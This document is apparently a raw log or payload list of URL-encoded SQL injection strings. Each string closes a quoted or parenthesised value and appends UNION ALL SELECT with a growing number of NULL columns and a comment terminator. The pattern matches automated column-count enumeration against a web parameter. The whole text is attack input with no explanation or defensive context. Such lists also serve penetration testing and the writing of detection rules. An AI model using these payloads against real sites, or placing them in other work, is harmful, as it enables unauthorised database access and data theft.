1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 